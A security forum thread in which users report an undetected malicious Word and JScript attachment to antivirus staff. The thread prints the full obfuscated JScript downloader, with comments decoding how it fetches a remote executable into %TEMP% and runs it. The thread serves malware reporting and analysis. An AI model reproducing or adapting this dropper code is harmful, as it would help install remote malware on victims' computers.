Avast Endpoint Protection Suite Plus.
Malware comes as a Winword document named, for example, FACTURA_16510F.doc.doc
After 24h still undetected by Exchange plug-in or file shield.
Running MsWord in a sandbox on a test machine shows us the malicious actions, but avast is incapable of stopping it from spreading.
always post a link to the scan result, as there is a lot of info we can't see from a picture
If you give a link, avast can see the MD5 and fetch the sample from VT
also see this >> https://forum.avast.com/index.php?topic=14433.msg1289438#msg1289438
File submitted to avast via “Report files to the avast virus lab” via UI.
No idea if the report system is up&running.
File submitted to avast via "Report files to the avast virus lab" via UI. No idea if the report system is up&running. Then it should now be in their auto-analysis system and soon detected
Fixed just now. Thank you!
Hello,
the sample which is in the VT link did not come to us from avast’s submit
Milos
Received today as finance_ERNMDr.js
https://virustotal.com/en/file/9dc19555d7e18f2ab52f11c681b1b77622e13b32bca647fa3fd4f8a1920fdefb/analysis/
// Decoy helper: ignores its argument and returns a fixed string.
// It is not referenced anywhere in this listing (obfuscation filler).
function ugBGdd(WDUMuBD) {
return "LfFVaQXWbQrafO";
}
// Calls JsBdh.write(Mricp): hiMQQA[1]+hiMQQA[2] is "\x77\x72\x69"+"\x74\x65", i.e. "write".
// hiMQQA[0] is never used. In the main body this copies an HTTP response body into an ADODB.Stream.
function wHDO(JsBdh,Mricp) {
var hiMQQA=["CKxnTNTN","\x77"+"\x72\x69","\x74\x65"];JsBdh[hiMQQA[1]+hiMQQA[2]](Mricp)
}
// Calls vvLfi.open(): rmmIXAJ[0] is "\x6F\x70"+"\x65\x6E", i.e. "open"; 512-512 is just index 0.
function vXSm(vvLfi) {
var rmmIXAJ=["\x6F\x70"+"\x65\x6E"];vvLfi[rmmIXAJ[512-512]]();
}
// Opens a synchronous request on an XMLHTTP-style object:
// zXKD.open(method = fWnGt, url = GjTKY, async = false).
// Note the parameter order: the URL is the second argument, the HTTP verb the third.
// zXKD is assigned without var, so it leaks as an implicit global.
function LdwL(vsQUJ,GjTKY,fWnGt) {
zXKD=vsQUJ;
//OVcXfwArsljb
zXKD.open(fWnGt,GjTKY,false);
}
// True when idaPz == 200 (525-325): an HTTP "OK" status check on the download response.
function wMQi(idaPz) {
if (idaPz == 525-325){return true;} else {return false;}
}
// True when AFoFh > 194012 (194552-540). Used as a minimum size for the downloaded
// body, presumably to discard error pages or empty/sinkholed responses.
function WwRv(AFoFh) {
if (AFoFh > 194552-540){return true;} else {return false;}
}
// Decoy helper: returns the empty string regardless of its arguments.
// Not referenced anywhere in this listing.
function pBUUs(XIhUzsMy,YETu) {
return "";
}
// Calls NcpfK.send(): ZGGAWvpw[0] is "\x73\x65"+"\x6E\x64", i.e. "send".
// Because the request was opened synchronously, this blocks until the response arrives.
function NNTC(NcpfK) {
var ZGGAWvpw=["\x73\x65"+"\x6E\x64"];
NcpfK[ZGGAWvpw[0]]();
}
// Returns Cqisw.status (the HTTP status code of the completed request).
function Yerj(Cqisw) {
return Cqisw.status;
}
// Returns FtcD.ExpandEnvironmentStrings(CPxLz). The push-then-index-0 round trip
// through the implicit global array BMAviLJ is obfuscation only.
function ItgMlmd(FtcD,CPxLz) {
BMAviLJ=[];
BMAviLJ.push(FtcD.ExpandEnvironmentStrings(CPxLz));
return BMAviLJ[0];
}
// Returns HOEl.responseBody: the literal decodes to "respon*seBody", which is split
// on "*" and re-joined, yielding the property name "responseBody" (raw bytes of the response).
function YLRmWfB(HOEl) {
var DZIXhQo=("\x72\x65\x73\x70\x6F\x6E*\x73\x65\x42\x6F\x64\x79").split("*");
return HOEl[DZIXhQo[0]+DZIXhQo[1]];
}
// Calls cKsxV.saveToFile(JZzJL, 2). VPHFv decodes to ["ToF","ile","sa","ve"];
// SeRmbp = "sa"+"ve"+"ToF"+"ile" == "saveToFile"; 878-876 == 2 (ADO's adSaveCreateOverWrite),
// so an existing file at JZzJL is overwritten.
function zfLr(cKsxV,JZzJL) {
var VPHFv=("\x54\x6F\x46*\x69\x6C\x65*\x73\x61*\x76\x65").split("*");
var YNJofthT=VPHFv[964-964];
var SeRmbp=VPHFv[385-383]+VPHFv[534-531]+YNJofthT+VPHFv[364-363];
var Ycbbryn=[SeRmbp];cKsxV[Ycbbryn[872-872]](JZzJL,878-876);
}
// Returns YGi.size (used on the ADODB.Stream holding the downloaded body).
function ApmvqIaG(YGi) {
return YGi.size;
}
// Sets HjgdnX.position = 0 (rewinds the stream before saving) and returns the
// assigned value, i.e. 0; mWLJ[0] is "\x70\x6F\x73\x69\x74\x69\x6F\x6E" == "position".
function AJLfw(HjgdnX) {
var mWLJ=["\x70\x6F\x73\x69\x74\x69\x6F\x6E"];
return HjgdnX[mWLJ[112-112]]=531-531;
}
// Returns IhP.split(PBBBA); huKQ[0] decodes to "split". The string-table
// decoders below use it to cut filler tokens out of their literals.
function RfhDD(IhP,PBBBA) {
var huKQ=["\x73\x70\x6C\x69\x74"];
return IhP[huKQ[0]](PBBBA);
}
// Returns WScript.CreateObject(jcMaJ), i.e. instantiates a COM object by ProgID
// (only works under the Windows Script Host). frlguyL is an implicit global.
function PXVH(jcMaJ) {
frlguyL=WScript.CreateObject(jcMaJ);
return frlguyL;
}
// Returns new ActiveXObject(hKNgAm): a second way to instantiate a COM object by ProgID.
function feMVH(hKNgAm) {
var gGiZ=hKNgAm;
return new ActiveXObject(gGiZ);
}
// String decoder: returns the characters of MwLSU at odd indices (1, 3, 5, ...),
// dropping every even-index character. The arithmetic is constant folding only:
// 869-869 == 0, 208-206 == 2, 642-642 == 0, 408-407 == 1.
// K is assigned without var and so becomes an implicit global.
function Bbel(MwLSU) {
var XpIHi="";
K=(869-869);
do {
if (K >= MwLSU.length) {break;}
// keep the character only when K is odd
if (K % (208-206) != (642-642)) {
var PczOL = MwLSU.substring(K, K+(408-407));
XpIHi += PczOL;
}
K++;
} while(true);
return XpIHi;
}
// --- Main body: an obfuscated downloader/dropper. Behaviour as read from the code:
//   1. decode a space-separated list of URL fragments (Bbel keeps the odd-index chars of CF),
//   2. create a working folder under %TEMP%,
//   3. GET each candidate URL with MSXML2.XMLHTTP until one answers 200 with a body > 194012 bytes,
//   4. write that body via ADODB.Stream to <TEMP>\zPMNAcQ\509888.exe and launch it with WScript.Shell.Run.
// Detection points for defenders: wscript/cscript spawning an .exe from %TEMP%, and the
// MSXML2.XMLHTTP -> ADODB.Stream.saveToFile -> WScript.Shell.Run chain in one script.
// CF: every even-index character is filler; Bbel() strips it.
var CF="z?M 9?t KgFrPezeEtYi4nagbsNyaoduznKg1qhqI.jcioFmd/p7h0SsSv0yCx3?x 9gdoyo8g2ldet.YcuoPm2/u7B0ksLvayNxK?b Y?";
// qU: the decoded fragments, split on spaces.
var qU = Bbel(CF).split(" ");
// EawRKh[0]+EawRKh[2]+EawRKh[4] == ".exe"; EawRKh[5] == "svyx" is the token it replaces.
var EawRKh = ". DLyIqG e GYSWyrCX xe svyx".split(" ");
// u: five candidate URL fragments, each with every "svyx" rewritten to ".exe".
var u = [qU[0].replace(new RegExp(EawRKh[5],'g'), EawRKh[0]+EawRKh[2]+EawRKh[4]),qU[1].replace(new RegExp(EawRKh[5],'g'), EawRKh[0]+EawRKh[2]+EawRKh[4]),qU[2].replace(new RegExp(EawRKh[5],'g'), EawRKh[0]+EawRKh[2]+EawRKh[4]),qU[3].replace(new RegExp(EawRKh[5],'g'), EawRKh[0]+EawRKh[2]+EawRKh[4]),qU[4].replace(new RegExp(EawRKh[5],'g'), EawRKh[0]+EawRKh[2]+EawRKh[4])];
// Ssf: the expanded "%TEMP%\" path (see IxGpIgvki); its argument is ignored.
var Ssf = IxGpIgvki("judU");
// zkR: a Scripting.FileSystemObject (bRFkawbl builds that ProgID; its argument is ignored).
var zkR = feMVH(bRFkawbl("DMXuw"));
// QiCo: "<TEMP>\zPMNAcQ\"; Cgrzqz creates that folder, swallowing any error.
var GIZxNc = ("zPMNAcQ \\").split(" ");
var QiCo = Ssf+GIZxNc[0]+GIZxNc[1];
Cgrzqz(zkR,QiCo);
// Iwg pieces: "MS"+Iwg[3]+Iwg[0] == "MSXML2.XMLHTTP"; Iwg[7]+Iwg[9]+Iwg[11]+"B."+Iwg[5]+Iwg[4] == "ADODB.Stream".
// The (459567, Iwg[0]) / (715328, Iwg[4]) comma expressions only discard the number.
var Iwg = ("2.XMLHTTP vKcrgwn BUpXR XML ream St VsRhPnEU AD upCUihc O Ltxl D").split(" ");
var tg = true , JiRl = Iwg[7] + Iwg[9] + Iwg[11];   // JiRl == "ADOD"; tg is never read
var rl = PXVH("MS"+Iwg[3]+(459567, Iwg[0]));   // HTTP client object
var kTS = PXVH(JiRl + "B." + Iwg[5]+(715328, Iwg[4]));   // binary stream for the response body
var syK = 0;   // only read at loop entry below; the later `syK = N` is effectively dead
var M = 1;   // appended verbatim after each URL fragment
var EnnzxlW = 509888;   // numeric base name of the dropped executable
var N=syK;
while (true) {
if(N>=u.length) {break;}
var xc = 0;   // becomes 1 once a file has been saved
// cRx pieces: [0]+[2]+[5] == "http://", [12]+[14]+[16] == "GET", [7]+[9]+[11] == ".exe".
var cRx = ("ht" + " fZKxVOO tp yzfYS aEWydzTF :// HRUzypR .e NiAoL x gAtzwo e G unjXhuv E JCBKOtOR T auaZ").split(" ");
try {
var GudWPdo=cRx[747-742];   // "://"
var mTEjU=cRx[211-211]+cRx[996-994]+GudWPdo;   // "http://"
LdwL(rl,mTEjU+u[N]+M, cRx[12]+cRx[14]+cRx[16]); NNTC(rl);   // synchronous GET of "http://"+u[N]+"1", then send
if (wMQi(Yerj(rl))) {   // status == 200
// open the stream, set type 1 (adTypeBinary), write responseBody into it, then require size > 194012
vXSm(kTS); kTS.type = 1; wHDO(kTS,YLRmWfB(rl)); if (WwRv(ApmvqIaG(kTS))) {
lHsnXqw=/*3adR59o2pu*/QiCo/*WCV960bZSa*/+EnnzxlW+cRx[642-635]+cRx[139-130]+cRx[813-802];   // "<TEMP>\zPMNAcQ\509888.exe" (implicit global)
xc = 327-326;AJLfw(kTS);zfLr(kTS,lHsnXqw);   // xc = 1; position = 0; saveToFile(path, 2)
if (198>30) {   // always true
// execute the dropped file through WScript.Shell.Run (same path as lHsnXqw, rebuilt inline)
try {QQNtUXGEG(QiCo+EnnzxlW+cRx[662-655]+cRx[217-208]+cRx[127-116]);
}
catch (Ky) {
};
break;
}
}; kTS.close();
};
if (xc == 1) {
syK = N; break;
};
}
catch (Ky) {   // any failure (network, COM, I/O) is silently ignored and the next fragment is tried
};
N++;
};
// Creates folder DzvbYa with the FileSystemObject dyXJ; any error (e.g. the folder
// already exists) is swallowed.
function Cgrzqz(dyXJ,DzvbYa) {
try {dyXJ.CreateFolder(DzvbYa);}catch(RHPSHw){};
}
// Launches the file at DGVLHuJmCud. The "="-separated table yields, at indices
// 1,3,5,6,8,10,12, the pieces "Ws"+"c"+"ri"+"pt"+".S"+"he"+"ll" == "Wscript.Shell"
// (ProgIDs are case-insensitive); wmAypLdO then calls .run(path) on that object.
function QQNtUXGEG(DGVLHuJmCud) {
var kgYUxptk = RfhDD("nYYI=Ws=YVYzanO=c=ERoqEU=ri"+"=pt=AgLjTRIS=.S=wqaRx=he=oHRuOA=l"+"l=oCccVYp"+"=YbmhmZSM=zKTQ", "=");
var siwPYZXt = PXVH(kgYUxptk[116-115] + kgYUxptk[889-886] + kgYUxptk[856-851] + kgYUxptk[426-420] + kgYUxptk[719-711] + kgYUxptk[588-578]+kgYUxptk[438-426]);
wmAypLdO(siwPYZXt,DGVLHuJmCud);
}
// Calls mervF.run(GIaWSI): cGZHRX[1]+cGZHRX[2]+cGZHRX[3] is "\x72"+"\x75"+"\x6E" == "run".
// With mervF being a WScript.Shell object this executes GIaWSI as a command line.
function/*7Z0v*/wmAypLdO(mervF,GIaWSI) {
var cGZHRX= ("eTuinkRSSKQ;\x72;\x75;\x6E;RqKQQGKLZBoh").split(";");
var lja=cGZHRX[134-133]+cGZHRX[690-688]+cGZHRX[401-398];
var HHZZ=/*KXDE*/[lja];
//sqdI
mervF[HHZZ[741-741]](GIaWSI);
}
// Returns the expanded "%TEMP%\" path; the argument WziJh is never used.
// hprUi (split on "*") gives [2] == "pt.Shell", [4] == "Scri", [6]+[7] == "%TEMP%", [8] == "\".
// GGe = "W"+"Scri"+"pt.Shell" == "WScript.Shell" (the (559-558) condition is always true);
// QMAPgv is an implicit global.
function IxGpIgvki(WziJh) {
var cGDVwnT = "ZxgGon*NNl*pt.S"+"he"+"ll*cDAlHIk*Sc"+"ri*";
var hprUi = RfhDD(cGDVwnT+"ZzHa*%T"+"E*MP%*\\*ulhKZsODB*JpssvV*BOhaMni*UrWuw", "*");
var GGe=((559-558)?"W" + hprUi[318-314]:"")+hprUi[548-546];
var qC = PXVH(GGe);
QMAPgv=hprUi[615-609]+hprUi[951-944];
return ItgMlmd(qC,QMAPgv+hprUi[491-483]);
}
// Returns the ProgID "Scripting.FileSystemObject"; the argument FcbE is never used.
// After the space split: [0]"Sc" [2]"r" [4]"ipting" + ".F" + [7]"ile" [9]"System" [12]"Obj" [14]"ect".
function bRFkawbl(FcbE) {
var TKvSffTHxh = "Sc MhkbRrV r TYeXVhnnq ipt"+"ing uXXeckM ZSx ile vYlmbhOiZlRwWt";
var XZeFJTJ = RfhDD(TKvSffTHxh+" "+"Sys"+"tem yI IgnZV Obj LeDlln ect ACRjVrY WqmiV", " ");
return XZeFJTJ[0] + XZeFJTJ[2] + XZeFJTJ[4] + ".F" + XZeFJTJ[7] + XZeFJTJ[9] + XZeFJTJ[12] + XZeFJTJ[14];
}
Submitted, but after 36h avast is still happy with this file.
It can take some time to detect the files, unfortunately, depending on the amount of staff, the number of files, and whether it's detected by the automated systems.
The payload it downloads (ransomware?) has been taken down. Checked in the Malwarebytes forum yesterday
hmmm … seems the URL is up and running again. Sample sent to the avast lab
https://virustotal.com/en/file/a468a0c5aea6e25ab0d585c6caa169e3ccb579c909525a74b6595166be17b53b/analysis/1460561651/
detected now > https://virusscan.jotti.org/en-US/filescanjob/b0ley1audw